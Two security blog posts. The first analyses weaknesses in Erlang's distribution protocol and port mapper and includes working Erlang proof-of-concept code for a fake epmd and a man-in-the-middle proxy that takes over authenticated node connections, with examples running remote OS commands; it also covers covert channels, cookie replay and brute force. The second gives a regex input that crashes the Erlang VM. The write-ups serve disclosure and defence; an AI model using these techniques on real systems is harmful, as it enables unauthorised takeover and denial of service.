Wednesday, March 31, 2010

Spoofing the Erlang Distribution Protocol

(Update (2010/09/15): Well, that's annoying! With the release of Erlang R14B, it looks as if some of the issues with epmd have been fixed! Here is the log of the commit made by bufflig (Patrik Nyblom):
Fix anomalies in epmd not yet reported as security issues

Use erts_(v)snprintf to ensure no buffer overruns in debug printouts.
Disallow everything except port and name requests from remote nodes.
Disallow kill command even from localhost if alive nodes exist.
  -relaxed_command_check when starting epmd returns the possibility to
  kill this epmd when nodes are alive (from localhost).
Disallow stop command completely except if -relaxed_command_check is given
  when epmd was started.
Environment variable ERL_EPMD_RELAXED_COMMAND_CHECK can be set to always get

Fortunately (for those wishing to spoof the protocol), there are still other ways to kill epmd.

Awesome work by the Erlang/OTP team!)

One of the unique features of the Erlang programming language is the transparent, built in distribution. The unit of activity in Erlang is the process. Processes run on nodes which reside locally or on remote servers, communicating by message passing. If a process somewhere crashes, a linked process running on another server can detect the crash and perform error recovery.

Erlang distribution is very easy to use, pretty much working out of the box. But, in the default configuration, it's often advised that the Erlang distribution protocol is insecure and should only be run on trusted networks:
[The cookie authentication mechanism] is not entirely safe, as it is vulnerable against takeover attacks, but it is a tradeoff between fair safety and performance.
So the questions are: what are the risks in running a distributed Erlang node, where can distribution be used safely and what can be done to limit potential attacks against it?
Source code is available on github.

Erlang Distribution

The Erlang Port Mapper Daemon

Distributed Erlang nodes bind a random TCP port for distribution requests. The Erlang port mapper daemon, or epmd, maps the name of the node to the port on which the node is listening.

epmd acts as a key/value store. A node registers with epmd by opening a TCP connection to localhost on a well known port (4369). The node sends a message containing the node name and distribution port. The node is now registered and will remain registered until the TCP connection is dropped.

An example of a registration message is:
register({IP, Port}, Key, Value) ->
    Packet = <<
    120,                    % ALIVE2_REQ: x
    Value:16,               % PortNo
    77,                     % NodeType: normal Erlang node
    0,                      % Protocol: TCP
    0,5,                    % Highest Version
    0,5,                    % Lowest Version
    (byte_size(Key)):16,    % NLen
    Key/bytes,              % NodeName
    0,0                     % ELen
    >>,
    {ok, Socket} = gen_tcp:connect(IP, Port, [
            {packet, 2},    % epmd requests carry a 2 byte length header
            {active, true},
            binary
        ]),
    ok = gen_tcp:send(Socket, Packet),
    wait(Socket).           % keep the connection open to stay registered

wait(Socket) ->
    receive _ -> wait(Socket) end.

A Distributed Erlang Node

A node is started in distributed mode when the -sname or -name option is passed on the command line to the erl command. Erlang will start an epmd process if one is currently not running.

When a request is made to connect to another distributed Erlang node, for example by calling net_adm:ping/1 with the node name, the Erlang node resolves the portion of the node name after the @ symbol (or uses localhost, if the node was brought up using -sname) and sends a PORT_PLEASE2_REQ request for the name (the portion of the atom preceding the @ sign) to epmd at the resolved IP address. epmd responds with a message containing the node's port and closes the connection.
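As a rough illustration of that lookup, here is a minimal sketch of the request and response bodies. The module and function names are made up for this example, the response layout is assumed to mirror the registration fields shown earlier, and the 2 byte length header on the request is assumed to be added by the socket ({packet, 2}).

```erlang
-module(epmd_port_sketch).
-export([port_please2_req/1, parse_port2_resp/1]).

%% Build the body of a PORT_PLEASE2_REQ: the byte 122 ("z") followed by
%% the short node name (the part before the @).
port_please2_req(Name) when is_binary(Name) ->
    <<122, Name/binary>>.

%% Parse a PORT2_RESP: 119 ("w"), a result byte (0 means success), then
%% the port, node type, protocol, version range and node name.
parse_port2_resp(<<119, 0, Port:16, _Type, _Proto, _High:16, _Low:16,
                   NLen:16, Name:NLen/binary, _Extra/binary>>) ->
    {ok, Name, Port};
parse_port2_resp(<<119, Result, _/binary>>) when Result > 0 ->
    {error, Result};
parse_port2_resp(_) ->
    {error, badarg}.
```

Nothing in the response is authenticated, which is what makes a fake port mapper possible later on.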

The originating Erlang node now opens a TCP connection to the destination Erlang node's distribution port. The nodes authenticate each other using the Erlang cookie mechanism. If the challenge handshake succeeds, the nodes are connected. Communication is bidirectional. This link will be used for all distributed operations between the two nodes.

Erlang Cookies

Erlang cookie authentication resembles RADIUS, CHAP and X11 magic cookies. Cookies are a secret that must be known to all members of the Erlang cluster. Valid characters in a cookie are ASCII 32-126 (space to tilde).

Generating the Erlang Cookie

If a secret is not provided, Erlang will generate a 20 byte file in the user's home directory (~/.erlang.cookie) composed of uppercase letters. Erlang uses a weak pseudo-random number generator with an implementation similar to rand(3). The seed is the seconds and microseconds fields of erlang:now(). The returned random value acts as the seed for the next random value until 20 uppercase letters are chosen. The creation time of the ~/.erlang.cookie file is changed to midnight to obscure the initial seed value.
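To show why a time-based seed matters, here is a minimal sketch of a cookie generator of this shape. The multiplier, modulus and letter mapping are illustrative assumptions rather than a verified copy of the OTP source, and the module name is invented. The point is only that the cookie is a pure function of the seed, so anyone who can guess the seed can enumerate candidate cookies.

```erlang
-module(cookie_sketch).
-export([cookie/1, candidates/2]).

%% Derive a 20 letter uppercase cookie from an integer seed using a
%% simple linear congruential generator (constants are assumptions).
cookie(Seed) when is_integer(Seed), Seed >= 0 ->
    cookie(20, Seed, []).

cookie(0, _X, Acc) ->
    lists:reverse(Acc);
cookie(N, X0, Acc) ->
    X = next(X0),
    %% X is below 2^36, so this maps it onto one of 26 letters.
    Letter = $A + (X * 26) div 16#1000000000,
    cookie(N - 1, X, [Letter | Acc]).

%% Each random value is the seed for the next one.
next(X) ->
    (X * 17059465 + 1) band 16#fffffffff.

%% Enumerate the cookie for every seed in a range, for example every
%% seed that corresponds to a plausible creation time.
candidates(From, To) when From =< To ->
    [{Seed, cookie(Seed)} || Seed <- lists:seq(From, To)].
```

With a seed built only from seconds and microseconds, the range passed to candidates/2 is small compared to the space of all 20 letter strings.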

The Challenge Handshake

The challenge process is explained in the Erlang kernel documentation. The kernel docs show a 4 byte digest used to verify knowledge of the secret, instead of the 16 byte digest generated by MD5. Maybe at one point the cookie mechanism used something like CRC32. (The docs have since been updated.)

After the TCP connection is established, the originating node sends:
  • "n"
  • Version0
  • Version1
  • Flag0
  • Flag1
  • Flag2
  • Flag3
  • Name0
  • Name1
  • Name2
  • ...
  • NameN
The version fields are 2 bytes and contain the minimum/maximum version of the distribution protocol supported by the node. The Name fields hold the bytes representing the full name of the originating node (node and domain name).
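The layout above maps directly onto Erlang's bit syntax. This is a minimal sketch with made-up module and function names; it assumes the 2 byte length framing is handled by the socket and only covers the message body.

```erlang
-module(dist_name_sketch).
-export([encode_name/3, decode_name/1]).

%% "n", a 2 byte version, 4 bytes of flags, then the full node name.
encode_name(Version, Flags, Name) when is_binary(Name) ->
    <<$n, Version:16, Flags:32, Name/binary>>.

%% The name has no length field of its own: it runs to the end of the
%% message.
decode_name(<<$n, Version:16, Flags:32, Name/binary>>) ->
    {ok, Version, Flags, Name};
decode_name(_) ->
    {error, badarg}.
```

Because the name simply runs to the end of the message, anything sitting between the two nodes can read it without knowing the cookie.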

The destination node replies with a status message indicating how the originating node may proceed. For example, the connection might not be allowed because a connection is in progress or might already exist.
  • "s"
  • Status0
  • Status1
  • ...
  • StatusN
If the status indicates the connection can continue, the destination node sends another message containing the challenge.
  • "n"
  • Version0
  • Version1
  • Flag0
  • Flag1
  • Flag2
  • Flag3
  • Challenge0
  • Challenge1
  • Challenge2
  • Challenge3
  • Name0
  • Name1
  • Name2
  • ...
  • NameN
This message contains the versions supported by the destination node, any compatibility flags, the 4 byte challenge and the node name. The challenge is generated by gathering some runtime statistics:
%% ---------------------------------------------------------------
%% Challenge code
%% gen_challenge() returns a "random" number
%% ---------------------------------------------------------------
gen_challenge() ->
    {A,B,C} = erlang:now(),
    {D,_}   = erlang:statistics(reductions),
    {E,_}   = erlang:statistics(runtime),
    {F,_}   = erlang:statistics(wall_clock),
    {G,H,_} = erlang:statistics(garbage_collection),
    %% A(8) B(16) C(16)
    %% D(16),E(8), F(16) G(8) H(16)
    ( ((A bsl 24) + (E bsl 16) + (G bsl 8) + F) bxor
        (B + (C bsl 16)) bxor
        (D + (H bsl 16)) ) band 16#ffffffff.
The originating node computes the digest by concatenating the challenge with the cookie and digesting the result using MD5:
%% Generate a message digest from Challenge number and Cookie
gen_digest(Challenge, Cookie) when is_integer(Challenge), is_atom(Cookie) ->
    erlang:md5([atom_to_list(Cookie)|integer_to_list(Challenge)]).
The resulting 16 byte MD5 digest is sent to the destination node along with a new 4 byte challenge.
  • "r"
  • Challenge0
  • Challenge1
  • Challenge2
  • Challenge3
  • Digest0
  • Digest1
  • Digest2
  • ...
  • Digest15
The destination node verifies the received digest, computes a digest based on the origin node's challenge and replies with an acknowledgement message:
  • "a"
  • Digest0
  • Digest1
  • Digest2
  • ...
  • Digest15
If either digest does not match, the nodes will drop the connection and log a handshake failure. Authentication is performed once for each TCP connection; no further verification is done after the handshake completes. If the TCP connection is dropped, for whatever reason, a new TCP connection must go through the authentication procedure again.
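The reply and acknowledgement steps can be sketched as a handful of pure functions. This is a sketch under assumptions: the digest is taken to be MD5 over the cookie followed by the challenge written as a decimal string, the cookie is passed as a string rather than an atom, and the module and function names are invented for the example.

```erlang
-module(handshake_sketch).
-export([digest/2, reply/3, check_reply/3, ack/2, check_ack/3]).

%% Assumed digest construction: MD5 of cookie ++ decimal challenge.
digest(Challenge, Cookie) when is_integer(Challenge), is_list(Cookie) ->
    erlang:md5([Cookie | integer_to_list(Challenge)]).

%% "r": the originating node answers challenge A and issues challenge B.
reply(ChallengeA, ChallengeB, Cookie) ->
    <<$r, ChallengeB:32, (digest(ChallengeA, Cookie))/binary>>.

%% The destination checks the digest against the challenge it issued.
check_reply(<<$r, ChallengeB:32, Digest:16/binary>>, ChallengeA, Cookie) ->
    case digest(ChallengeA, Cookie) of
        Digest -> {ok, ChallengeB};
        _ -> {error, bad_digest}
    end.

%% "a": the destination answers challenge B.
ack(ChallengeB, Cookie) ->
    <<$a, (digest(ChallengeB, Cookie))/binary>>.

%% The originating node checks the acknowledgement.
check_ack(<<$a, Digest:16/binary>>, ChallengeB, Cookie) ->
    case digest(ChallengeB, Cookie) of
        Digest -> ok;
        _ -> {error, bad_digest}
    end.
```

Note what the digest covers: the challenge and the cookie, and nothing else. Node names, addresses and everything sent afterwards are outside it.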

Abusing epmd

Running epmd

epmd comes from an environment where physical servers are dedicated to a single task. Probably all Erlang nodes ran under a single UID.

On multiuser systems, such as development servers or systems that require some privilege separation, the first Erlang node to run starts and controls the epmd process. This user can now control the port map requests given for other nodes. The user running epmd can also snoop name requests.

The temptation might be to explicitly start epmd as root at boot. Use a dedicated user instead; there's no reason to run epmd as root.

epmd Authentication

epmd only requires a few operations: registering a node name and port, retrieving a port based on node name, retrieving all names and ports known to the epmd process (as well as some debug info, if requested), and shutting down epmd.

Logically, these operations differ for local and remote access. A remote node, for example, would never register a node/port value, since ports are local to the node and the registration does not include an IP address; in fact, the epmd command line flags such as "-names" will only connect to localhost. Yet epmd makes no distinction between local and remote access, and authentication is not required to query it.

Any device that is allowed to open a TCP connection to the epmd port can:
  • issue a kill command and shut down the epmd process: any new attempts at joining in Erlang distribution with nodes residing on this server will fail
  • set any key/value pair
epmd allows storing of arbitrary bytes. "epmd -names" simply echoes these bytes. The output displayed by running "epmd -names" is the actual formatted message returned by the epmd server. So epmd could be used to store data, as long as the TCP connection is maintained. Some scenarios:
  • bypass network segmentation: if 2 hosts can talk to the host running epmd but not each other
  • establish a covert channel
Covert channels could be used for:
  • interprocess communication, like a command queue for bots
  • tunnelling data: TCP over epmd over TCP!
  • storage of data: the basis of a FUSE filesystem
A naive implementation might be to store an ID as the node name (the key), with the data stored in the 2 byte value allocated for the port. Even when using a secure transport layer (ssl, ssh) for the Erlang distribution protocol, nodes will still need a way of finding each other. epmd is too risky to place on a public network.
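That naive scheme might look something like the following sketch, which only does the encoding and leaves the registration connections out. The module name, the key format (a prefix plus a sequence number) and the zero padding of an odd trailing byte are all choices made up for this example.

```erlang
-module(covert_sketch).
-export([encode/2, decode/1]).

%% Split Data into {NodeName, PortValue} pairs. Each pair carries 2
%% bytes of payload in the field epmd reserves for the port.
encode(Prefix, Data) when is_binary(Prefix), is_binary(Data) ->
    encode(Prefix, Data, 0, []).

encode(_Prefix, <<>>, _Seq, Acc) ->
    lists:reverse(Acc);
encode(Prefix, <<Value:16, Rest/binary>>, Seq, Acc) ->
    encode(Prefix, Rest, Seq + 1, [{key(Prefix, Seq), Value} | Acc]);
encode(Prefix, <<Byte>>, Seq, Acc) ->
    %% Odd trailing byte: pad with a zero byte. A real scheme would
    %% need to record the original length somewhere.
    encode(Prefix, <<>>, Seq + 1, [{key(Prefix, Seq), Byte bsl 8} | Acc]).

key(Prefix, Seq) ->
    <<Prefix/binary, (integer_to_binary(Seq))/binary>>.

%% Reassemble the payload from pairs given in sequence order.
decode(Pairs) ->
    << <<Value:16>> || {_Key, Value} <- Pairs >>.
```

Each pair would need its own registration, and so its own open TCP connection, which makes this slow and noisy but workable.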

Abusing Cookies

The cookie mechanism only proves that, for the given TCP connection, there is knowledge of the secret. Though the node names are included in the challenge message, they are not included in the digest. Similarly, neither IP addresses nor timestamps are included in the digest. The Erlang cookie authentication also does not validate the data sent after the handshake is completed, so there is no integrity checking built into the distribution protocol.

Replaying the Challenge

The response to a challenge is generated by concatenating a 4 byte challenge with the secret and digesting the result using MD5. The Erlang kernel documentation for this process notes the 32-bit integer used as the challenge must be very random, but really it needs only to be well distributed. The response to the challenge proves the node knows the secret. At least in theory, the only practical way to derive the secret from the digest is using brute force. But knowing the response to the challenge is equivalent to knowing the secret, if the challenge is ever repeated. The strength of the cookie mechanism lies in the time before a challenge is repeated.
1> cookie:start().
In the above test, an attacker would have had to snoop 971 handshakes before there is a repeated challenge. There are 2 challenges for each authentication. Only one successful connection is needed since the attacker can run erlang:get_cookie() once authenticated. However, being able to replay a challenge requires being able to somehow snoop connections. And for most systems, authentication is a rare event, since TCP connections for internode communication are persistent.
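A test of this kind can be sketched as a loop that draws challenges until one repeats. This is not the code behind the test above, just a minimal stand-in: the module name is invented and the generator is passed in as a fun so any challenge source can be measured.

```erlang
-module(repeat_sketch).
-export([first_repeat/1]).

%% Call Gen() until it returns a value that has been seen before.
%% Returns the repeated value and the number of calls it took.
first_repeat(Gen) when is_function(Gen, 0) ->
    first_repeat(Gen, sets:new(), 1).

first_repeat(Gen, Seen, N) ->
    Challenge = Gen(),
    case sets:is_element(Challenge, Seen) of
        true ->
            {repeat, Challenge, N};
        false ->
            first_repeat(Gen, sets:add_element(Challenge, Seen), N + 1)
    end.
```

For comparison, a well distributed 32-bit source such as fun() -> rand:uniform(16#ffffffff) end should typically run for tens of thousands of draws before repeating, which is the birthday bound for 2^32 values.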

Brute Force

Since all nodes share the same cookie, and given that cookies likely change very rarely, it's possible for the attacker to open connections to each node and brute force in parallel. Since MD5 is quite fast, and there is no provision in the protocol to slow down the digesting process, many attacks can be run.
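To give a feel for how cheap each guess is, here is a minimal sketch of the offline variant: it assumes the attacker has already captured one challenge and the matching digest, and that the digest is MD5 over the cookie followed by the decimal challenge. The module name and the candidate list are made up for the example.

```erlang
-module(brute_sketch).
-export([crack/3]).

%% Try each candidate cookie (a string) against a captured
%% challenge/digest pair. One MD5 per guess, no network traffic.
crack(Challenge, Digest, Candidates)
  when is_integer(Challenge), is_binary(Digest), is_list(Candidates) ->
    Suffix = integer_to_list(Challenge),
    Miss = fun(Cookie) -> erlang:md5([Cookie | Suffix]) =/= Digest end,
    case lists:dropwhile(Miss, Candidates) of
        [Cookie | _] -> {ok, Cookie};
        [] -> not_found
    end.
```

The candidate list is where a weak cookie generator hurts: if the cookie was generated from a guessable seed, the list can be short.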


For many environments, the threat of replay and brute force might not be that bad. While they are feasible, if you do any sort of monitoring, you'll very likely notice an attack in progress. The lack of any sort of integrity protection is a real issue; one that Erlang developers have addressed, to an extent, with the SSL transport mechanism.

Proxying from a Local Node

Since anyone can stop epmd, an attacker on the same server can bring up their own port mapper service. When epmd is killed, the attached Erlang nodes will not attempt to reconnect. An attacker can listen on any available port, open a connection to the distribution port of the Erlang node that is being targeted and advertise the port of the spoofing proxy to any distribution requests. spoofed contains some code to demonstrate this sort of attack. First, we retrieve the ports known to epmd by sending a name request (the letter "n", with a 2 byte length header):
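names(IP, Port) ->
    Packet = list_to_binary([<<110>>]),       % NAMES_REQ: n
    {ok, Socket} = gen_tcp:connect(IP, Port, [
            {packet, 2},                      % adds the 2 byte length header
            {active, false},
            binary
        ]),
    ok = gen_tcp:send(Socket, Packet),
    ok = inet:setopts(Socket, [{packet, 0}]), % the response has no length header
    gen_tcp:recv(Socket, 0).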
Next, we set up a fake epmd to answer port map requests. The fake epmd binds the well-known epmd port and spawns a process to handle each TCP connection. For most message types, the client expects epmd to close the connection after responding. The exception is node registration: breaking the connection will deregister the node.
loop(Socket, Port) ->
    receive
        {tcp, Socket, <<110>>} ->               % NAMES_REQ: n
            inet:setopts(Socket, [{packet, 0}]),
            Response = list_to_binary([
                    <<4369:32>>,                % EPMDPortNo
                    lists:flatten(io_lib:format("I can haz ~s at port ~p~n", ["fake", Port]))
                ]),
            error_logger:info_report([{epmd, names_request}, {response, Response}]),
            ok = gen_tcp:send(Socket, Response);
        {tcp, Socket, <<122, Node/binary>>} ->  % PORT_PLEASE2_REQ: z
            inet:setopts(Socket, [{packet, 0}]),
            Response = <<
            119,                    % PORT2_RESP: w
            0,                      % Result: no error
            Port:16,                % PortNo
            77,                     % NodeType: normal Erlang node
            0,                      % Protocol: TCP
            0,5,                    % Highest Version
            0,5,                    % Lowest Version
            (byte_size(Node)):16,   % NLen
            Node/bytes,             % NodeName
            0,0                     % ELen
            >>,
            error_logger:info_report([{epmd, Node}, {response, Response}]),
            ok = gen_tcp:send(Socket, Response);
        {tcp_closed, Socket} ->
            error_logger:info_report([{epmd, tcp_close}]);
        {tcp_error, Socket, Reason} ->
            error_logger:info_report([{epmd, tcp_error}, {reason, Reason}])
    end.
Finally, we set up the proxy to listen on the fake Erlang distribution port. The proxy just proxies any data, including the challenge handshake. Since the origin and destination nodes presumably share a common cookie, the authentication will succeed. Assuming 59000 is the distribution port of the Erlang node and port 59001 is unbound, we could run a proxy as follows:
spoof:epmd(59001). % where the argument is where our proxy port will be listening
spoof:proxy(59000, 59001). % Erlang distribution port, fake Erlang node proxy port.
At this point we can snoop the data being sent between nodes. Of course, we still do not know the cookie, only a derived secret (probably 2 of them), but the TCP connection from our proxy is fully authenticated. We could drop the connection to the originating node at this point and send our own messages as a fully connected distributed node:
(n@ack.lan)1> erlang:get_cookie().
However, we can also modify the connection in interesting ways:
1> F = fun(in,X)  -> re:replace(X, "foo", "bar", [{return, binary}]);
1>        (out,X) -> X end.

2> spoof:proxy(59000, 59001, F).

3> foo == bar.

4> Afoo = 123.

7> rpc:call('n@ack.lan', os, cmd, ["echo foofoo"]).

8> rpc:call('n@ack.lan', os, cmd, ["touch /tmp/ohaifoothere"]).

9> rpc:call('n@ack.lan', os, cmd, ["ls /tmp/ohaifoothere"]).

Proxying from a Remote Node

Assuming an attacker can convince an Erlang node to connect to a host under their control (using DNS poisoning, ARP spoofing, social engineering, ...), the attacker can proxy the connection anywhere. There's a problem with proxying a connection from a host to a node that is not local, though. The challenge messages contain the full name of the node that is sending the message, including the domain name. Assume there are 3 nodes: nul.lan (the originating node), ecn.lan (the destination node) and ack.lan (the attacker). If an Erlang node on nul.lan accidentally connects to ack.lan intending to reach ecn.lan (or any other node sharing the same cookie), ack.lan can forward the connection to ecn.lan. nul.lan may not even have intended to connect to ecn.lan.
spoof:proxy({{10,10,10,10},59000}, 59001, F).
Since the source/destination node names will not match, we will need to re-write them for this to work, but since there are no integrity checks, the process works transparently:
F = fun(in,X)  -> re:replace(X, "@ack.lan", "@ecn.lan", [{return, binary}]);
       (out,X) -> re:replace(X, "@ecn.lan", "@ack.lan", [{return, binary}]) end.
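To see the rewrite on an actual message, here is a minimal sketch that applies the same substitution to a hand-built name message. The module name and the sample message are assumptions for illustration. The dot is escaped so it only matches a literal dot, and the two host names are the same length, so any length prefix in front of the message stays valid.

```erlang
-module(rewrite_sketch).
-export([filter/2]).

%% Inbound data: make the attacker's host look like the destination.
filter(in, Data) ->
    re:replace(Data, "@ack\\.lan", "@ecn.lan", [{return, binary}]);
%% Outbound data: undo the substitution on the way back.
filter(out, Data) ->
    re:replace(Data, "@ecn\\.lan", "@ack.lan", [{return, binary}]).
```

If the host names differed in length, the proxy would presumably also have to fix up the length header of every frame it touches.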

Forcing a Node to Connect to Itself

Even on a network where the attacker does not know which nodes share the same cookie, an Erlang node can always be forced to connect to itself. Since the Erlang node will use its cookie for both sides of the authentication, it will, of course, succeed. The attacker will only need to rewrite the node names. For example, if ecn.lan thinks it's talking to ack.lan:
1> F = fun(in,X)  -> re:replace(X, "@ecn.lan", "@ack.lan", [{return, binary}]);
1>     (out,X) -> re:replace(X, "@ack.lan", "@ecn.lan", [{return, binary}]) end.
2> spoof:proxy({IP, Port}, ProxyPort, F).

erl -name r@nul.lan -remsh n@ack.lan
1> os:cmd("hostname").
This would work, for example, against a user connecting from a laptop to a node using erl -remsh or running etop:start([{node, ''}]). (It's also worth mentioning, since I've never seen it discussed, that if you connect to a distributed Erlang node, everybody who's authenticated to connect to that node has complete access to your workstation as your uid.)

"Legitimate" Uses

spoofed could be used as an example for creating an epmd that provides some protection against remote nodes abusing it and for creating Erlang distribution proxies. An Erlang distribution proxy could potentially have these advantages:
  • listens only to a single port
  • authentication mechanisms (GSS-API, SSL, etc)
  • could allow creating sandboxes by parsing the distribution messages

Tuesday, March 9, 2010

When the Bugs Have Bugs

A few months ago, I found this. Compiling a regular expression would crash beam.
N = 819,
re:compile([lists:duplicate(N, $(), lists:duplicate(N, $))]).
After going through a bit of effort, I figured out how to compile a debug version of beam. And then, of course, I discovered the clever minds behind Erlang have already thought about this and made it easy. Essentially, after compiling Erlang:
# Recommended if you are a vi user
# Yes, the debugger forces you to use emacs
cat >> ~/.emacs <<'EOF'
(setq viper-mode t)
(require 'viper)
EOF

export ERL_TOP=$(pwd)
cd erts/emulator
make debug FLAVOR=plain # or smp
cd ~-
bin/cerl -debug -gdb # -smp
After reading through the source code and adding a few printf's, I tracked the bug down to an incorrect test in PCRE. The magic number (819) apparently comes from:
819 x 5 bytes (capturing bracket) + 3 bytes (opening bracket) = 4098 bytes
The compile workspace is 4096 bytes, so there is a 2 byte overflow. Well, today Philip Hazel, the author of PCRE, corrected the bug. Awesome!! Thanks, Philip!
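The arithmetic is easy to check. A minimal sketch, using only the figures quoted above (5 bytes per capturing bracket, 3 bytes for the opening bracket) and an invented module name:

```erlang
-module(workspace_sketch).
-export([bytes_needed/1, max_depth/1]).

%% Workspace used by N nested capturing brackets, per the figures above.
bytes_needed(N) when is_integer(N), N >= 0 ->
    N * 5 + 3.

%% Deepest nesting that still fits in a workspace of the given size.
max_depth(Workspace) when is_integer(Workspace), Workspace >= 3 ->
    (Workspace - 3) div 5.
```

By these numbers 818 levels is the last depth that fits in 4096 bytes, and 819 is the first that does not.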
So here I am making the world safer one bug at a time, preparing a patch for Erlang. Except when I went to test the fix on Mac OS X, beam crashed. Ouch. This time:
% works!
N = 611,
re:compile([lists:duplicate(N, $(), lists:duplicate(N, $))]).

% booo! crashes!!
N = 612,
re:compile([lists:duplicate(N, $(), lists:duplicate(N, $))]).
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0xb014effc
[Switching to process 3601]
0x001c04e4 in compile_branch (optionsptr=0x0, codeptr=0x0, ptrptr=0x0, errorcodeptr=0x0, firstbyteptr=0x0, reqbyteptr=0x0, bcptr=0x0, cd=0x0, lengthptr=0x0) at pcre_compile.c:2355
Except, beam didn't crash when running inside gdb. I figured out the debug beam was non-smp and, after compiling a debug smp version, I got the longest backtrace EVAH.

Yet the same code works with an SMP Erlang on Solaris.
Blah, debugging threaded code is a pain. If someday, someone figures out how to do something malicious with this, please send me a postcard from whatever island retreat you've purchased with all your stolen credit cards or DoS extortions.